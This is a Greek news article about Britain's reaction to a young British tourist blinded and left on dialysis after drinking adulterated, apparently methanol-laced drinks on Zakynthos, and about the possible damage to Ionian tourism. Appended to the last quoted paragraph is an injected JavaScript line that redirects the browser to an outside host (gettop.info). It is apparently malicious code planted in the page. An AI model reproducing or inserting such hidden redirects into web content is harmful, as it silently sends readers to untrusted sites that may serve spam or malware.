Στη μαύρη λίστα των Βρετανών Ζάκυνθος, Ιόνιο και Δυτική Ελλάδα

0
16

 

Στη μαύρη λίστα Άγγλων τουριστών και ιδιαίτερα των νέων που πριν συμβεί το τραγικό περιστατικό με την τύφλωση της 20χρονης τουρίστριας και την καταστροφή των νεφρών της από ποτά μπόμπα είχαν ως σκοπό ζωής να περάσουν ξέφρενες στιγμές διασκέδασης στη Ζάκυνθο φαίνεται να έχει μπει – σύμφωνα με Βρετανικά δημοσιεύματα – το νησί του Ιονίου.

Την ίδια ώρα ο κίνδυνος τα απόνερα της τραγωδίας που ζει η 20χρονη να πνίξουν γενικότερα τον τουρισμό στα νησιά του Ιονίου αλλά και ως ένα βαθμό τις μονάδες που λειτουργούν στα παράλια της Ηλείας και Αχαΐας θεωρείται πως είναι κάτι παραπάνω από ορατός, σύμφωνα με το patrastimes.gr.

Ήδη οι Βρετανικές εφημερίδες κάνουν εκτενή αναφορά στις νύχτες διασκέδασης στη Ζάκυνθο και το πώς λειτουργεί το σύστημα των καμικάζι της νύχτας, οι οποίοι με γνώμονα το κέρδος και μόνο δηλητηριάζουν και «σκοτώνουν» τους τουρίστες. ενώ θέτουν σωρεία ερωτηματικών για το τι συμβαίνει και κρύβεται πίσω από τον φτηνό τουρισμό και την ξέφρενη διασκέδαση που υπόσχονται πολλοί προορισμοί στην Ελλάδα.

Όσον αφορά στην 20χρονη Βρετανίδα που τυφλώθηκε από ποτά «μπόμπες» στη Ζάκυνθο, η μητέρα της παραχώρησε συνέντευξη στα βρετανικά ΜΜΕ και έκανε λόγο για κατεστραμμένα νεφρά.

«Τα νεφρά της είναι κατεστραμμένα. Κάνει αιμοκάθαρση κάθε μέρα», αναφέρει σε συνέντευξή της η μητέρα της Κριστίν, σύμφωνα με το patrastimes.gr.

«Η αστυνομία επικοινώνησε μαζί μας και συμπλήρωσε μια αναφορά, πιστεύουν ότι μπορεί να οφείλεται στη μεθανόλη, αλλά οι έρευνες βρίσκονται σε εξέλιξη. Η κόρη μου μπορεί να διακρίνει μόνο σχήματα», συμπλήρωσε περιγράφοντας την κατάσταση της κόρης της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here